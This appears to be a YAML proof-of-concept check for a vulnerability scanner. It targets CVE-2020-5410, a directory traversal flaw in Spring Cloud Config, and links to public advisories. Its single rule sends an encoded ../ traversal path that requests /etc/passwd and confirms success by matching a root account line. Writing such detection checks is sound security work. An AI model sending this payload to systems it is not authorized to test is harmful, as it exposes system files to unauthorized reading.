name: yaml-poc-vmware-spring_cloud_config-directory_traversal-CVE-2020-5410
binding: b14a0ed4-86d4-43a2-8dfc-8413b03842df
detail:
    author: system_user
    links:
        - http://www.nsfocus.net/vulndb/46848
        - https://nvd.nist.gov/vuln/detail/CVE-2020-5410
        - https://tanzu.vmware.com/security/cve-2020-5410
        - https://www.auscert.org.au/bulletins/ESB-2021.2731
    vulnerability:
        id: 0b3f7b06-a6ea-41a4-9a82-6d5d946c9b14
        level: high
    warning: Harmless
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
expression: r0()
